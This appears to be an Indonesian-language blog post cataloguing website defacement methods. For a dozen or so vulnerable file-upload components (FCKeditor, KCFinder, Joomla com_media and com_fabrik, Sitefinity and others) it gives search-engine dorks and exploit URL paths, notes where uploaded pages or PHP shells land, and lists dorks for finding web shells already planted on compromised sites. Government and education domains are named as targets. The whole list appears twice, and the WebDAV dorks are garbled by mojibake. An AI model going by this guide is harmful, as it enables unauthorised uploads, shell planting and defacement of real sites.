Poc Kindeditor
Dork :
- inurl:kindeditor
- inurl:/example/uploadbuttom.html
Path : Stlh upload file-nya jga nanti akan ada path-nya
Poc Fckeditor
Dork :
- inurl:/filemanager/upload/test.html
- inurl:advert_detail.php?id=
- inurl:/html/siswa.php?
- inurl:/html/alumni.php?
- inurl:/html/guru.php?
Exploit :
- /editor/filemanager/connectors/test.html
- /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Path :
- Stlh upload file-nya jga nanti akan ada path-nya
- site.com/file/ahhhh.html
- target.co.uk/userfiles/file/tod.txt
Note : Gunakan Exploit jika diperlukan & Tdk semua web vuln untuk upload file ber-ext (".html")
Poc Webdav
Dork :
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥�
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:edu
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:gov
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:com
- inurl:webdav
- inurl:.com.x/*.asp
- inurl:.edu.x/*.asp
- inurl:.gov.x/*.asp
- inurl:.net.x/*.asp
- inurl:.org.x/*.asp
Path : site.com/tai.html
Poc Drupal Hidden Uploader
Dork : Allowed filetype html site:com
Path : Klik nama file yg tlh diupload tadi
Note : Tdk semua web vuln untuk upload file ber-ext (".html")
Poc Sitefinity
Dork : inurl:"sitefinity/login.aspx
Exploit : /sitefinity/usercontrols/dialog/documenteditordialog.aspx
Path : http://sitetarget.com/files/jancok.html
Note : Tdk semua web vuln untuk upload file ber-ext (".html")
Poc KCFinder
Inurl:/kcfinder/browse.php
Path :
- target.com/file/hime.html
- target.com/file/[dir]/hime.html
Note : Bisa upload shell jga, tpi tdk semua web
Deface Onion.to File Upload
Dork :
- inurl:/upload site:.onion.to
- intext:"Upload" site:.onion.to
Path : site.com/uploads/mpsh.html
Poc com media + CSRF
Dork :
- inurl:com_media site:com
- inurl:com_media intext:"Upload"
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Path : vuln.com/images/namafile.txt
Poc Board Forum
Dork :
- inurl:"/forum_topic_create.php?"
- inurl:"/forum.php?forumid=
Path : Klik nama file yg tlh diupload tadi
Poc Exploit FileChucker File Upload
Dork :
- inurl:/cgi-bin/filechucker.cgi
- intext:Toptown File Upload
- inurl:/cgi-bin/filechucker.pl
- intext:File Upload by Encodable
Path : target.org/[dir yg ada dikolom]/nama.html
Note : Tdk semua web vuln untuk upload file yg ber-ext (".html")
Poc phUploader
Dork : intitle:"Powered by phUploader" intext:"txt"
Path : Stlh upload file-nya jga nanti akan ada path-nya
Poc Com_Fabrik
Dork :
- inurl:com_fabrik site:go.id (With CSRF)
- inurl:viewTable?cid= site:com
- inurl:index.php?option=com_fabrik
- inurl:index.php/component/fabrik/ site:
- inurl:index.php?option=com_fabrik&view= site:
- inurl:importcsv.php site:
Exploit :
- /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload (With CSRF)
- /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
- /index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Path :
- target.go.id/file.html (With CSRF + Upload Script ber-ext (".html"))
- tebas.go.id (With CSRF + Upload (".htaccess") + Upload Script ber-ext (".html"))
- site.go.id/media/shell.php
Note : Tdk semua web vuln untuk upload shell
Poc Spaw File Manager
Dork :
- inurl:Spaw2/dialogs/
- inurl:spaw2/uploads/files
- index of:/Spaw2/uploads/files
Exploit : /spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Path : vuln.com/spaw2/upload/files/script.html
Note : Tdk semua web vuln untuk upload file yg ber-ext (".html")
Poc Dorking Shell
Dork :
- inurl:/images/ intitle:sh3ll ext:php
- intitle:sh3ll ext:php "/public_html/"
- intitle:"IndoXploit" filetype:php # intitle:"IndoXploit" intext:"public_html" filetype:php
- intitle:"IndoXploit" intext:"mass deface" filetype:php
- intitle:"IndoXploit" intext:"mass delete" filetype:php
- intitle:"IndoXploit" intext:"jumping" filetype:php
- intitle:"IndoXploit" intext:"config" filetype:php
- intitle:"IndoXploit" intext:"config" filetype:php
- intitle:"IndoXploit" intext:"fake root" filetype:php
- intitle:"IndoXploit" intext:"auto edit user" filetype:php
- intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php
- intitle:"IndoXploit" intext:"WordPress Auto Deface" filetype:php
- intitle:"IndoXploit" intext:"WordPress Auto Deface V.2" filetype:php
- intitle:"IndoXploit" intext:"CPanel/FTP Auto Deface" filetype:php
- intitle:"IndoXploit" intext:"cpanel crack" filetype:php
- intitle:"IndoXploit" intext:"Adminer" filetype:php
- intitle:"IndoXploit" intext:"SMTP Grabber" filetype:php
- intitle:"IndoXploit" intext:"Zone-h" filetype:php
- intitle:"IndoXploit" intext:"CGI Telnet" filetype:php
- intitle:"IndoXploit" intext:"network" filetype:php
- intitle:"IndoXploit" intext:"K-RDP Shell " filetype:php
- intitle:"IndoXploit" intext:"newfile | newfolder" filetype:php
- inurl:"/wp-content/" intitle:"IndoXploit" filetype:php
- inurl:"/wp-content/" intitle:"b374k" filetype:php
- inurl:"/wp-content/" intitle:"b374k m1n1" filetype:php
- inurl:"/wp-content/" intitle:"Shell" filetype:php
- inurl:"/wp-content/" intitle:"Stupidc0de" filetype:php
- intitle:"1n73ction" filetype:php
- intext:"Cpanel Cracker" filetype:php
- intext:"Current DIR: /home/" filetype:php
- intext:"IndoXploit" filetype:php
- intitle:"c99" intext:"public_html" filetype:php
Poc Pro Taxi
Dork :
- inurl:/user/signin intext:SIGN IN NOW
- inurl:public/user/signup
Path : tolol.com/shell.php5
Note : Tdk semua web vuln untuk upload shell
Dork :
- inurl:kindeditor
- inurl:/example/uploadbuttom.html
Path : Stlh upload file-nya jga nanti akan ada path-nya
Poc Fckeditor
Dork :
- inurl:/filemanager/upload/test.html
- inurl:advert_detail.php?id=
- inurl:/html/siswa.php?
- inurl:/html/alumni.php?
- inurl:/html/guru.php?
Exploit :
- /editor/filemanager/connectors/test.html
- /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Path :
- Stlh upload file-nya jga nanti akan ada path-nya
- site.com/file/ahhhh.html
- target.co.uk/userfiles/file/tod.txt
Note : Gunakan Exploit jika diperlukan & Tdk semua web vuln untuk upload file ber-ext (".html")
Poc Webdav
Dork :
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥�
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:edu
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:gov
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:com
- inurl:webdav
- inurl:.com.x/*.asp
- inurl:.edu.x/*.asp
- inurl:.gov.x/*.asp
- inurl:.net.x/*.asp
- inurl:.org.x/*.asp
Path : site.com/tai.html
Poc Drupal Hidden Uploader
Dork : Allowed filetype html site:com
Path : Klik nama file yg tlh diupload tadi
Note : Tdk semua web vuln untuk upload file ber-ext (".html")
Poc Sitefinity
Dork : inurl:"sitefinity/login.aspx
Exploit : /sitefinity/usercontrols/dialog/documenteditordialog.aspx
Path : http://sitetarget.com/files/jancok.html
Note : Tdk semua web vuln untuk upload file ber-ext (".html")
Poc KCFinder
Inurl:/kcfinder/browse.php
Path :
- target.com/file/hime.html
- target.com/file/[dir]/hime.html
Note : Bisa upload shell jga, tpi tdk semua web
Deface Onion.to File Upload
Dork :
- inurl:/upload site:.onion.to
- intext:"Upload" site:.onion.to
Path : site.com/uploads/mpsh.html
Poc com media + CSRF
Dork :
- inurl:com_media site:com
- inurl:com_media intext:"Upload"
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Path : vuln.com/images/namafile.txt
Poc Board Forum
Dork :
- inurl:"/forum_topic_create.php?"
- inurl:"/forum.php?forumid=
Path : Klik nama file yg tlh diupload tadi
Poc Exploit FileChucker File Upload
Dork :
- inurl:/cgi-bin/filechucker.cgi
- intext:Toptown File Upload
- inurl:/cgi-bin/filechucker.pl
- intext:File Upload by Encodable
Path : target.org/[dir yg ada dikolom]/nama.html
Note : Tdk semua web vuln untuk upload file yg ber-ext (".html")
Poc phUploader
Dork : intitle:"Powered by phUploader" intext:"txt"
Path : Stlh upload file-nya jga nanti akan ada path-nya
Poc Com_Fabrik
Dork :
- inurl:com_fabrik site:go.id (With CSRF)
- inurl:viewTable?cid= site:com
- inurl:index.php?option=com_fabrik
- inurl:index.php/component/fabrik/ site:
- inurl:index.php?option=com_fabrik&view= site:
- inurl:importcsv.php site:
Exploit :
- /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload (With CSRF)
- /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
- /index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Path :
- target.go.id/file.html (With CSRF + Upload Script ber-ext (".html"))
- tebas.go.id (With CSRF + Upload (".htaccess") + Upload Script ber-ext (".html"))
- site.go.id/media/shell.php
Note : Tdk semua web vuln untuk upload shell
Poc Spaw File Manager
Dork :
- inurl:Spaw2/dialogs/
- inurl:spaw2/uploads/files
- index of:/Spaw2/uploads/files
Exploit : /spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Path : vuln.com/spaw2/upload/files/script.html
Note : Tdk semua web vuln untuk upload file yg ber-ext (".html")
Poc Dorking Shell
Dork :
- inurl:/images/ intitle:sh3ll ext:php
- intitle:sh3ll ext:php "/public_html/"
- intitle:"IndoXploit" filetype:php # intitle:"IndoXploit" intext:"public_html" filetype:php
- intitle:"IndoXploit" intext:"mass deface" filetype:php
- intitle:"IndoXploit" intext:"mass delete" filetype:php
- intitle:"IndoXploit" intext:"jumping" filetype:php
- intitle:"IndoXploit" intext:"config" filetype:php
- intitle:"IndoXploit" intext:"config" filetype:php
- intitle:"IndoXploit" intext:"fake root" filetype:php
- intitle:"IndoXploit" intext:"auto edit user" filetype:php
- intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php
- intitle:"IndoXploit" intext:"WordPress Auto Deface" filetype:php
- intitle:"IndoXploit" intext:"WordPress Auto Deface V.2" filetype:php
- intitle:"IndoXploit" intext:"CPanel/FTP Auto Deface" filetype:php
- intitle:"IndoXploit" intext:"cpanel crack" filetype:php
- intitle:"IndoXploit" intext:"Adminer" filetype:php
- intitle:"IndoXploit" intext:"SMTP Grabber" filetype:php
- intitle:"IndoXploit" intext:"Zone-h" filetype:php
- intitle:"IndoXploit" intext:"CGI Telnet" filetype:php
- intitle:"IndoXploit" intext:"network" filetype:php
- intitle:"IndoXploit" intext:"K-RDP Shell " filetype:php
- intitle:"IndoXploit" intext:"newfile | newfolder" filetype:php
- inurl:"/wp-content/" intitle:"IndoXploit" filetype:php
- inurl:"/wp-content/" intitle:"b374k" filetype:php
- inurl:"/wp-content/" intitle:"b374k m1n1" filetype:php
- inurl:"/wp-content/" intitle:"Shell" filetype:php
- inurl:"/wp-content/" intitle:"Stupidc0de" filetype:php
- intitle:"1n73ction" filetype:php
- intext:"Cpanel Cracker" filetype:php
- intext:"Current DIR: /home/" filetype:php
- intext:"IndoXploit" filetype:php
- intitle:"c99" intext:"public_html" filetype:php
Poc Pro Taxi
Dork :
- inurl:/user/signin intext:SIGN IN NOW
- inurl:public/user/signup
Path : tolol.com/shell.php5
Note : Tdk semua web vuln untuk upload shell
No comments:
Post a Comment